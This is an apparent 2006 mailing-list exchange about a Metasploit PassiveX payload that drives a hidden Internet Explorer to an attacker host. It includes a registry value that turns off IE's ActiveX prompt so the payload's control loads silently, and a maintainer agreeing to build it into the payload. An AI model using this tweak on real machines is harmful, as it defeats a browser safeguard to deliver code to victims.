Using the PassiveX payload

[mmiller at hick.org (mmiller at hick.org)]

On Fri, May 05, 2006 at 06:18:44PM +0200, Feature Meister wrote:
> Hi,
>
> the dll does not get downloaded into %WINDIR%\Downloaded Program Files.
> After some more troubleshooting and debugging (with process explorer)
> I found out that the hidden IE is started with "...\iexplore.exe -new
> http://192.168.71.75:8000/.
> So I tried this one from a regular command line.
> Result: IE prevented an ActiveX Control from being loaded and executed
> automatically. Instead  I was presented with a pop-up and the usual IE
> information bar.
> I then looked at the security settings of Internet-Zone. Besides
> "Automatic prompting for ActiveX controls" everythin was set so that
> the control would execute without asking.
> However the above setting was set to "Disable". I changed it to
> "Enable" according to the helpful help dialog ;-) and tried it again:
> it works!
> The required setting in
> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
> Settings\Zones\3 would be:
>
> "2201"=dword:00000000
>
> probably this could be added to the actual exploit code?

Yeah, this sounds like another registry value we need to add to make it
work properly in XPSP2.  Thanks for the info!  We'll look at adding this
in a future version of the payload.  Should only increase the size by
four bytes.